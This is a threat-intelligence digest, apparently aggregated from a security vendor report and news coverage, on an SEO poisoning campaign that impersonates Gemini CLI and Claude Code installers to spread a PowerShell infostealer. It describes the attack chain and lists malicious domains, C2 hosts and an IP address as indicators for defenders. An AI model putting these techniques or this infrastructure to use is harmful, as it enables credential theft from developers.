SEO Poisoning Campaign Targets Gemini and Claude Code Users with Infostealers

Severity: High (Score: 66.5)

Sources: Blog.Eclecticiq, Letsdatascience

Published: 2026-05-22 · Updated: 2026-05-22

Keywords: campaign, gemini, researchers, poisoning, claude, code, impersonation

Severity indicators: stealer, infostealer

Summary

A recent SEO poisoning campaign has been uncovered, targeting users searching for Google's Gemini CLI and Anthropic's Claude Code. The campaign, first identified by researcher @g0njxa on April 21, 2026, utilizes typosquatted domains to deliver a PowerShell infostealer to Windows developer workstations. Victims are misled into executing malicious commands from fake installation pages, leading to data exfiltration including browser credentials and OAuth tokens. The attack infrastructure includes domains like geminicli[.]co[.]com and claudecode[.]co[.]com, which mimic legitimate installation guides. The malware operates entirely in memory to evade detection, and the campaign is believed to have started in early March 2026. Security researchers emphasize the need for offline-install workflows and robust endpoint monitoring to mitigate risks. The ongoing nature of this campaign highlights the evolving tactics of financially motivated cybercriminals targeting developer tools. Key Points: • SEO poisoning campaign targets Gemini CLI and Claude Code users with fake domains. • Malware delivered via PowerShell infostealer, harvesting sensitive data from Windows systems. • Campaign exploits typosquatting and -engine manipulation to mislead victims.

Detailed Analysis

**Impact** The campaign targets developers using Google’s Gemini CLI and Anthropic’s Claude Code, primarily affecting Windows workstations in the US and UK based on domain registration patterns. The infostealer harvests sensitive data including browser credentials, session cookies, OAuth tokens, CI/CD credentials, and VPN details, increasing supply-chain and initial-access risks for enterprises. The scope includes potentially thousands of developer endpoints given the SEO poisoning approach and broad targeting of AI developer tooling users. **Technical Details** Attackers use SEO poisoning and typosquatted domains (e.g., geminicli[.]co[.]com, claudecode[.]co[.]com) to impersonate legitimate installation pages, prompting victims to execute PowerShell commands that download an infostealer payload. The malware runs entirely in memory, disables Microsoft Defender telemetry, and exfiltrates data to encrypted C2 servers (events[.]msft23[.]com and events[.]ms709[.]com). The infection chain includes obfuscated PowerShell scripts with anti-sandbox checks and enables remote code execution post-compromise. No CVEs were reported as exploited. **Recommended Response** Block and monitor access to newly registered or typosquatted domains mimicking Gemini and Claude Code installers, and deploy detections for in-memory PowerShell execution correlated with web downloads. Harden endpoint security by enabling telemetry and monitoring for disabled Microsoft Defender components and anomalous OAuth token or CI/CD credential usage. Encourage offline or verified installation workflows for critical developer tools. No specific patches are indicated; focus on detection and domain takedown efforts.

Source articles (2)

• Researchers Uncover SEO-Poisoned Sites Delivering Infostealers | Let's Data Science — Letsdatascience · 2026-05-22
  Security researchers at EclecticIQ have detailed an SEO poisoning campaign that used typosquatted domains impersonating Google's Gemini CLI and Anthropic's Claude Code to deliver an in-memory PowerShe…
• SEO poisoning campaign leverages Gemini and Claude Code impersonation to deliver infostealer — Blog.Eclecticiq · 2026-05-21
  The Gemini CLI impersonation campaign was first publicly identified by independent threat researcher @g0njxa [1] , whose initial discovery enabled analysis and infrastructure pivoting documented in th…

Timeline

• 2026-03-01 — SEO poisoning campaign began: Attacker-controlled domains started appearing, targeting users of Gemini CLI and Claude Code.
• 2026-04-21 — Initial discovery reported: Independent researcher @g0njxa flagged the SEO poisoning campaign, enabling further analysis.
• 2026-05-21 — EclecticIQ report published: EclecticIQ detailed the ongoing SEO poisoning campaign in a report, outlining its methods and impacts.
• 2026-05-22 — Coverage by Let's Data Science: Let's Data Science reported on the EclecticIQ findings, emphasizing the campaign's targeting of developer tools.

Related entities

• Malware (Attack Type)
• Claude Code Impersonation Campaign (Campaign)
• Gemini CLI Impersonation Campaign (Campaign)
• Netherlands (Country)
• United Kingdom (Country)
• United States (Country)
• CWE-287 - Improper Authentication (Cwe)
• api.bio9438.com (Domain)
• chocolatey.co.com (Domain)
• chocolatey-download.co.com (Domain)
• chocolatey-setup.co.com (Domain)
• claude-code.co.com (Domain)
• claudecode.co.com (Domain)
• claude-setup.com (Domain)
• co.com (Domain)
• code-install.co.com (Domain)
• co.uk (Domain)
• events.ms709.com (Domain)
• events.msft23.com (Domain)
• geminicli.co.com (Domain)
• gemini-setup.com (Domain)
• geninicli.co.com (Domain)
• get-monero.co.uk (Domain)
• getmonero.us.com (Domain)
• keepassxc.us.com (Domain)
• keepassxc.us.org (Domain)
• metrics.msft17.com (Domain)
• nodejs-setup.co.com (Domain)
• olive3451.com (Domain)
• openclow.co.com (Domain)
• pinvoke.net (Domain)
• setup.com (Domain)
• us.com (Domain)
• us.org (Domain)
• 109.107.170.111 (Ipv4)
• T1041 - Exfiltration Over C2 Channel (Mitre Attack)
• T1047 - Windows Management Instrumentation (Mitre Attack)
• T1059.001 - PowerShell (Mitre Attack)
• T1071 - Application Layer Protocol (Mitre Attack)
• T1105 - Ingress Tool Transfer (Mitre Attack)
• Brave (Platform)
• Chocolatey (Platform)
• Chromium (Platform)
• Firefox (Platform)
• Microsoft Defender (Platform)
• Microsoft Edge (Platform)
• Windows (Platform)
• Claude Code (Tool)
• Gemini CLI (Tool)
• Google Chrome (Tool)
• KeePassXC (Tool)
• Node.js (Tool)
• PowerShell (Tool)